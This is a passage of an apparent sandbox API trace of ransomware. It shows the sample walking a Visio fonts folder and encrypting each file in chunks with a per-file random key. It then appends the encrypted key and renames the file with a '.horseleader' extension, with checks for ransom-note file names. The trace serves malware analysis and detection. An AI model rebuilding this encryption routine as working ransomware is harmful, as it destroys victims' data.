lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.530] CloseHandle (hObject=0x1a4) returned 1 [0250.531] GetProcessHeap () returned 0x780000 [0250.531] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.531] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX.horseleader") returned 94 [0250.531] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\chineset.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\CHINESET.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\chineset.shx.horseleader")) returned 1 [0250.532] GetProcessHeap () returned 0x780000 [0250.532] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) 
returned 1 [0250.532] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x81eb4fa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0x6a9e6, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="EXTFONT.SHX", cAlternateFileName="")) returned 1 [0250.532] lstrcmpiW (lpString1="EXTFONT.SHX", lpString2="Windows") returned -1 [0250.533] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX") returned 81 [0250.533] StrStrIW (lpFirst="EXTFONT.SHX", lpSrch=".horseleader") returned 0x0 [0250.533] lstrcmpW (lpString1="EXTFONT.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.533] lstrcmpW (lpString1="EXTFONT.SHX", lpString2="_uninstalling_.png") returned 1 [0250.533] lstrlenW (lpString=".testttjffg") returned 11 [0250.533] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX", lpSrch=".testttjffg") returned 0x0 [0250.533] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.533] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.533] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\extfont.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 
[0250.534] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX") returned 81 [0250.534] StrStrW (lpFirst="EXTFONT.SHX", lpSrch=".txt") returned 0x0 [0250.534] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=436710) returned 1 [0250.534] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.534] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.540] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.540] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.541] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x32cf3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.541] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.543] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.543] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.543] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x659e6, lpNewFilePointer=0x0, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.543] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.546] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.546] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.546] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.546] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.547] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.547] CloseHandle (hObject=0x1a4) returned 1 [0250.547] GetProcessHeap () returned 0x780000 [0250.547] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.547] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX.horseleader") returned 93 [0250.547] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\extfont.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\Visio Shared\\Fonts\\EXTFONT.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\extfont.shx.horseleader")) returned 1 [0250.548] GetProcessHeap () returned 0x780000 [0250.548] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.548] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x8207e020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0xdc6b9, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="GBCBIG.SHX", cAlternateFileName="")) returned 1 [0250.548] lstrcmpiW (lpString1="GBCBIG.SHX", lpString2="Windows") returned -1 [0250.548] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX") returned 80 [0250.548] StrStrIW (lpFirst="GBCBIG.SHX", lpSrch=".horseleader") returned 0x0 [0250.548] lstrcmpW (lpString1="GBCBIG.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.548] lstrcmpW (lpString1="GBCBIG.SHX", lpString2="_uninstalling_.png") returned 1 [0250.548] lstrlenW (lpString=".testttjffg") returned 11 [0250.549] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX", lpSrch=".testttjffg") returned 0x0 [0250.549] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.549] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.549] CreateFileW (lpFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\gbcbig.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.549] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX") returned 80 [0250.549] StrStrW (lpFirst="GBCBIG.SHX", lpSrch=".txt") returned 0x0 [0250.550] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=902841) returned 1 [0250.550] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.550] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.552] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.553] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.554] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x6bb5c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.554] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.556] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.557] 
WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.557] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xd76b9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.557] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.559] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.559] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0250.560] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.560] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.560] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.560] CloseHandle (hObject=0x1a4) returned 1 [0250.560] GetProcessHeap () returned 0x780000 [0250.560] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.560] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio 
Shared\\Fonts\\GBCBIG.SHX.horseleader") returned 92 [0250.560] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\gbcbig.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\gbcbig.shx.horseleader")) returned 1 [0250.561] GetProcessHeap () returned 0x780000 [0250.562] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.562] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2656900, ftCreationTime.dwHighDateTime=0x1c2706c, ftLastAccessTime.dwLowDateTime=0x820ca2e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc2656900, ftLastWriteTime.dwHighDateTime=0x1c2706c, nFileSizeHigh=0x0, nFileSizeLow=0x2b01, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="IC-TXT.SHX", cAlternateFileName="")) returned 1 [0250.562] lstrcmpiW (lpString1="IC-TXT.SHX", lpString2="Windows") returned -1 [0250.562] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX") returned 80 [0250.562] StrStrIW (lpFirst="IC-TXT.SHX", lpSrch=".horseleader") returned 0x0 [0250.562] lstrcmpW (lpString1="IC-TXT.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.562] lstrcmpW (lpString1="IC-TXT.SHX", lpString2="_uninstalling_.png") returned 1 [0250.562] lstrlenW (lpString=".testttjffg") returned 11 [0250.562] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX", lpSrch=".testttjffg") returned 0x0 [0250.562] CryptGenRandom (in: hProv=0x7c6248, 
dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.562] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.562] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\ic-txt.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.563] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX") returned 80 [0250.563] StrStrW (lpFirst="IC-TXT.SHX", lpSrch=".txt") returned 0x0 [0250.563] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=11009) returned 1 [0250.563] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2b01, lpOverlapped=0x0) returned 1 [0250.565] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd4ff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.565] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2b01, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2b01, lpOverlapped=0x0) returned 1 [0250.566] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.566] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 
[0250.566] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.566] CloseHandle (hObject=0x1a4) returned 1 [0250.566] GetProcessHeap () returned 0x780000 [0250.566] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.566] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX.horseleader") returned 92 [0250.566] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\ic-txt.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\IC-TXT.SHX.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\ic-txt.shx.horseleader")) returned 1 [0250.567] GetProcessHeap () returned 0x780000 [0250.567] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.567] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8f60300, ftCreationTime.dwHighDateTime=0x1c324cc, ftLastAccessTime.dwLowDateTime=0x820ca2e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc8f60300, ftLastWriteTime.dwHighDateTime=0x1c324cc, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="ICAD.FMP", cAlternateFileName="")) returned 1 [0250.568] lstrcmpiW (lpString1="ICAD.FMP", lpString2="Windows") returned -1 [0250.568] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\Visio Shared\\Fonts\\ICAD.FMP") returned 78 [0250.568] StrStrIW (lpFirst="ICAD.FMP", lpSrch=".horseleader") returned 0x0 [0250.568] lstrcmpW (lpString1="ICAD.FMP", lpString2="#Decrypt#.txt") returned 1 [0250.568] lstrcmpW (lpString1="ICAD.FMP", lpString2="_uninstalling_.png") returned 1 [0250.568] lstrlenW (lpString=".testttjffg") returned 11 [0250.568] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP", lpSrch=".testttjffg") returned 0x0 [0250.568] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.568] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.568] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\icad.fmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0250.569] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP") returned 78 [0250.569] StrStrW (lpFirst="ICAD.FMP", lpSrch=".txt") returned 0x0 [0250.569] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=326) returned 1 [0250.569] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x146, lpOverlapped=0x0) returned 1 [0250.570] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.570] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, 
nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x146, lpOverlapped=0x0) returned 1 [0250.570] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.570] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0250.571] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0250.571] CloseHandle (hObject=0x1a4) returned 1 [0250.571] GetProcessHeap () returned 0x780000 [0250.571] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e3120 [0250.571] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP.horseleader") returned 90 [0250.571] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\icad.fmp"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\ICAD.FMP.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\icad.fmp.horseleader")) returned 1 [0250.572] GetProcessHeap () returned 0x780000 [0250.572] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e3120 | out: hHeap=0x780000) returned 1 [0250.572] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b362800, 
ftCreationTime.dwHighDateTime=0x1c10ce8, ftLastAccessTime.dwLowDateTime=0x853f7be0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x2b362800, ftLastWriteTime.dwHighDateTime=0x1c10ce8, nFileSizeHigh=0x0, nFileSizeLow=0x369d3, dwReserved0=0xb5cdeaf9, dwReserved1=0xa8c03106, cFileName="WHGDTXT.SHX", cAlternateFileName="")) returned 1 [0250.572] lstrcmpiW (lpString1="WHGDTXT.SHX", lpString2="Windows") returned -1 [0250.572] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX") returned 81 [0250.572] StrStrIW (lpFirst="WHGDTXT.SHX", lpSrch=".horseleader") returned 0x0 [0250.572] lstrcmpW (lpString1="WHGDTXT.SHX", lpString2="#Decrypt#.txt") returned 1 [0250.572] lstrcmpW (lpString1="WHGDTXT.SHX", lpString2="_uninstalling_.png") returned 1 [0250.572] lstrlenW (lpString=".testttjffg") returned 11 [0250.572] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX", lpSrch=".testttjffg") returned 0x0 [0250.572] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0250.572] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0250.572] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\WHGDTXT.SHX" (normalized: "c:\\program 